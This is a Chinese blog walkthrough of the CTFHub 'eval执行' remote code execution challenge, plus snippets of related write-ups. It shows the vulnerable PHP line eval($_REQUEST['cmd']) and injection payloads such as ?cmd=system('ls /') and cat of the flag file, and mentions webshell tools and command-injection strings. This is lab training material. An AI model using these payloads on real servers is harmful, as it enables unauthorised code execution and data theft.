CTFHUB RCE-----eval执行

最新推荐文章于 2025-09-25 08:38:48 发布

原创最新推荐文章于 2025-09-25 08:38:48 发布 · 1.7k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#web安全

本文通过实例解析PHP中eval()函数的应用，展示如何利用该函数执行外部命令并找到隐藏的flag_28679，涉及目录操作和文件读取过程。

首先进入题目

我们先了解一下php当中eval()函数的作用

eval()函数中的eval是evaluate的简称，这个函数的作用就是把一段字符串当作PHP语句来执行。

比如说eval($_REQUEST["cmd"])

$_REQUEST[]是接收数据用的,而其中的cmd 就是其中的数据

进入题目

cmd是其中的参数，我们就把命令赋给cmd,我们先显示一下网页的根目录

?cmd=system("ls ");

接着我们看上一级目录

?cmd=system("ls /");

发现flag_28679

我们cat它

拿到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

谨溪

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

CTFHUB-RCE-eval执行

u014794539的博客

07-11

356

考点一句话木马 eval执行思路分析打开直接 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 那就直接连蚁剑了。。。。直接找到了得到flag ctfhub{587c0757ccda0ba89da63da0} ...

CTFHUB——RCE之eval执行和文件包含漏洞

m0_46467017的博客

08-31

6810

代码解释:本关代码和第一关文件包含一样，通过strpos函数判断参数是否存在flag字符，存在就执行include函数。因为本关没有限制php://input伪协议，所以本关解法和上一关一样，这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样，通过substr函数来判断file参数是否等于php://，如果等于就执行include函数。代码解释为如果存在cmd参数，那就用eval函数执行cmd参数中的代码，所以本关存在命令执行。连接成功后，其余步骤与上一关相同。...

参与评论您还未登录，请先登录后发表或查看评论

CTFHub RCE通关笔记1：eval执行（两种方法渗透）

最新发布

mooyuan的网络安全博客

09-25

931

本文讲解CTFHub的RCE-eval关卡的原理和渗透实战的全过程，系统分析了PHP中eval()函数的基本语法与安全风险，包括其动态执行字符串代码的特性、作用域访问规则及错误处理机制。通过渗透实战案例，演示了两种利用eval()的攻击方法：一是直接执行系统命令（如ls和cat）获取服务器敏感文件；二是上传WebShell木马（如通过fputs生成后门文件），结合蚁剑工具实现远程控制。文章强调eval()的滥用可能导致任意代码执行（RCE）等严重安全问题，并提供了典型攻击场景的复现过程与防御思路。

CTF之eval

qq_74263993的博客

04-27

1175

_REQUEST变量是一个关联数组，它的键是表单元素的名称，值是用户输入的数据。通过$_REQUEST变量，可以访问表单中所有输入字段的值，不论它们是使用GET、POST还是COOKIE方法提交的。在PHP中，$_REQUEST是一个超全局变量，用于收集HTML表单提交的数据。如果代码中存在解析错误，则 eval() 函数返回 false。hello=show_source('flag.php')该字符串必须是合法的 PHP 代码，且必须以分号结尾。

【CTFHub】 RCE － eval执行

cx_sam的博客

08-07

1189

CTFHub RCE eval执行

CTFHUB-技能树-Web题-RCE（远程代码执行）-eval执行

Static______的博客

05-09

827

CTFHUB-技能树-Web题-RCE（远程代码执行）

CTFHub | eval执行

尼泊罗河伯的博客

04-19

1919

eval 函数可以将字符串作为代码执行，那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码，就会导致严重的安全问题。

CTFHub-Web-RCE-eval执行题目解析

weixin_46168073的博客

11-15

1597

一、启动场景点击web 点击RCE 点击eval执行。开启题目，启动场景。注册会送1000个币，做一个题目消耗30，做完奖励100还是50，总之完全不用担心币的问题。启动之后会出现一个链接，我们点击。二、解题过程这里会出现PHP代码。我们使用蚁剑。（安装之类的我会单独写一篇文章）右键--->添加数据。把URL复制到蚁剑，密码cmd 然后点击添加。可以看到我们添加数据成功。双击进...

【CTFHub】 RCE －文件包含

cx_sam的博客

08-07

1933

CTF WEB RCE 文件包含

CTFHub~RCE远程代码执行-命令注入

weixin_67832625的博客

08-06

904

本篇详细介绍了CTFHub中RCE远程代码执行漏洞的过程和解题步骤，有什么问题随时联系者

ctfhub--ctf--web--RCE（1.eval执行2.文件包含3.常见伪协议用法4.php://input5.远程包含6.读取源代）

feiniaotjx的博客

10-05

730

RCE1.eval执行2.文件包含3.php://input 1.eval执行 request接受post和get请求，接受cmd参数使用远程系统命令遍历目录查看文件 2.文件包含需要传一个file参数，不能为flag，存在shell.txt,可连接shell，故可以访问?file=shell.txt 之后post提交ctfhub=system('cat /flag');查看flag 3.php://input ...

ctfhub技能树web：RCE里的eval执行和命令注入

2302_81010533的博客

03-30

778

远程命令/代码执行漏洞，简称为RCE漏洞，可以直接向服务器后台远程注入操作系统的命令或者代码，从而拿到服务器后台的权限。首先执行ping命令，ping本机ip:127.0.0.1,再加上ls这个系统命令，连起来就是127.0.0.1;ls接着查看里面的文件，构造命令127.0.0.1;检查网页显示内容可以发现题目中直接给出了一段源代码，代码的大致意思是判断用户是否传了一个 cmd 参数，否则执行 else。检查目录列表发现关于flag的文件，检查内容发现flag。，查看可以访问的文件，发现一个。

CTFhub RCE eval

luminous_you的博客

12-07

412

方法一：可以用蚁剑直接连接webshell cd / find -name flag*//查找当前目录以及子目录下以flag开头的文件方法二：【这里用post,用get也可以，毕竟是request记得加；】 cmd=system(“ls /”); cmd=system(“cd /;ls”); cmd=system(“cd /;cat flag_31360”); ...

ctfhub-eval执行

m0_52432374的博客

03-24

2133

ctfhub-eval执行打开题目，发现是这个 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 然后百度eval()函数 eval():把字符串 code 作为PHP代码执行。函数eval()语言结构是非常危险的，因为它允许执行任意 PHP 代码。它这样用是很危险的。如果您仔细的确认过，除了使用此结构以外别无方法

eval执行

qq_69100706的博客

08-05

865

在CTF（Capture The Flag）竞赛中，利用eval()函数进行远程代码执行（RCE）是一种常见的技巧，尤其是在PHP、Python、JavaScript等支持动态执行代码的编程语言中。eval()函数可以将字符串解析并执行为代码，这使得它成为潜在的安全风险，如果未经适当控制和验证，攻击者可以利用它来执行任意代码。

ctfhub eval执行

a666666688的博客

08-05

507

大致意思是判断用户是否传入了一个cmd，否则执行else。函数会将传入的字符串当作 PHP 代码来执行。中的数据）传递了名为。函数来执行该参数的值。

ctfhub--技能树rce

lulu001128的博客

02-28

1132

解题思路

CTFHUB----web前置技能-rce

01-01

### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介远程命令执行（Remote Command Execution, RCE），是指攻击者能够通过应用程序接口发送特定指令，在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用，可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞当面对可能存在RCE漏洞的应用程序时，通常会寻找可以输入数据的地方，比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用，则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞为了确认是否真的存在这样的安全风险，可以通过尝试注入一些简单的测试语句来观察响应情况。例如，在支持PHP环境的情况下，可以试着向目标页面传递如下payload： ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息，则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去，那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表： ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素，如编码方式转换、特殊字符转义等问题以确保成功绕过防护机制达到想要的效果。 #### 安全建议对于开发者而言，预防此类问题的发生至关重要。应当遵循最小权限原则分配资源访问权；对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程；定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。